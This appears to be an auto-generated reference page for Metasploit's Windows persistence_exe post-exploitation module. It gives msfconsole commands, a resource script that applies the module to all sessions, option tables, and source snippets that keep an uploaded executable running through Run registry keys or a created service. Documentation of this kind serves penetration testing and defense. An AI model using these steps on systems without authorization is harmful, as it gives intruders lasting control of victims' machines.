Windows Manage Persistent EXE Payload Installer - Metasploit


This page contains detailed information about how to use the post/windows/manage/persistence_exe metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Windows Manage Persistent EXE Payload Installer
Module: post/windows/manage/persistence_exe
Source code: modules/post/windows/manage/persistence_exe.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This Module will upload an executable to a remote host and make it Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login, SYSTEM will start on system boot but requires privs. SERVICE will create a new service which will start the payload. Again requires privs.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/manage/persistence_exe

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/manage/persistence_exe
msf post(persistence_exe) > show options
    ... show and set options ...
msf post(persistence_exe) > set SESSION session-id
msf post(persistence_exe) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/manage/persistence_exe")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

  • REXEPATH: The remote executable to upload and execute.

Go back to menu.

Msfconsole Usage

Here is how the windows/manage/persistence_exe post exploitation module looks in the msfconsole:

msf6 > use post/windows/manage/persistence_exe

msf6 post(windows/manage/persistence_exe) > show info

       Name: Windows Manage Persistent EXE Payload Installer
     Module: post/windows/manage/persistence_exe
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Merlyn drforbin Cousins <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  REXENAME  default.exe      yes       The name to call exe on remote system
  REXEPATH                   yes       The remote executable to upload and execute.
  RUN_NOW   true             no        Run the installed payload immediately.
  SESSION                    yes       The session to run this module on.
  STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

Description:
  This Module will upload an executable to a remote host and make it 
  Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER 
  will start on user login, SYSTEM will start on system boot but 
  requires privs. SERVICE will create a new service which will start 
  the payload. Again requires privs.

Module Options

This is a complete list of options available in the windows/manage/persistence_exe post exploitation module:

msf6 post(windows/manage/persistence_exe) > show options

Module options (post/windows/manage/persistence_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   REXENAME  default.exe      yes       The name to call exe on remote system
   REXEPATH                   yes       The remote executable to upload and execute.
   RUN_NOW   true             no        Run the installed payload immediately.
   SESSION                    yes       The session to run this module on.
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

Advanced Options

Here is a complete list of advanced options supported by the windows/manage/persistence_exe post exploitation module:

msf6 post(windows/manage/persistence_exe) > show advanced

Module advanced options (post/windows/manage/persistence_exe):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   LocalExePath                         no        The local exe path to run. Use temp directory as default.
   ServiceDescription                   no        The description of service. Random string as default.
   StartupName                          no        The name of service or registry. Random string as default.
   VERBOSE             false            no        Enable detailed status messages
   WORKSPACE                            no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the windows/manage/persistence_exe module can do:

msf6 post(windows/manage/persistence_exe) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the windows/manage/persistence_exe post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/manage/persistence_exe) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Error: failed to open the registry key for writing

Here is a relevant code snippet related to the "Error: failed to open the registry key for writing" error message:

135:	    if key
136:	      registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", nam, script_on_target, "REG_SZ")
137:	      print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
138:	      @clean_up_rc << "reg deleteval -k '#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -v '#{nam}'\n"
139:	    else
140:	      print_error("Error: failed to open the registry key for writing")
141:	    end
142:	  end
143:	
144:	  # Function to install payload as a service
145:	  #-------------------------------------------------------------------------------

Service <NAM> creating failed.

Here is a relevant code snippet related to the "Service <NAM> creating failed." error message:

152:	
153:	      key = service_create(nam, :path => "cmd /c \"#{script_on_target}\"", :display => description)
154:	
155:	      # check if service had been created
156:	      if key != 0
157:	        print_error("Service #{nam} creating failed.")
158:	        return
159:	      end
160:	
161:	      # if service is stopped, then start it.
162:	      service_start(nam) if datastore['RUN_NOW'] and service_status(nam)[:state] == 1

Insufficient privileges to create service

Here is a relevant code snippet related to the "Insufficient privileges to create service" error message:

161:	      # if service is stopped, then start it.
162:	      service_start(nam) if datastore['RUN_NOW'] and service_status(nam)[:state] == 1
163:	
164:	      @clean_up_rc << "execute -H -f sc -a \"delete #{nam}\"\n"
165:	    else
166:	      print_error("Insufficient privileges to create service")
167:	    end
168:	  end
169:	
170:	  # Function for writing executable to target host
171:	  #-------------------------------------------------------------------------------

Insufficient privileges to write in <LOCALEXEPATH>, writing to %TEMP%

Here is a relevant code snippet related to the "Insufficient privileges to write in <LOCALEXEPATH>, writing to %TEMP%" error message:

176:	
177:	      begin
178:	        temprexe = datastore['LocalExePath'] + "\\" + rexename
179:	        write_file_to_target(temprexe, rexe)
180:	      rescue Rex::Post::Meterpreter::RequestError
181:	        print_warning("Insufficient privileges to write in #{datastore['LocalExePath']}, writing to %TEMP%")
182:	        temprexe = session.sys.config.getenv('TEMP') + "\\" + rexename
183:	        write_file_to_target(temprexe, rexe)
184:	      end
185:	
186:	    # Write to %temp% directory if not set LocalExePath

Go back to menu.

Go back to menu.

See Also

Check also the following modules related to this module:

Authors

  • Merlyn drforbin Cousins <drforbin6[at]gmail.com>

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.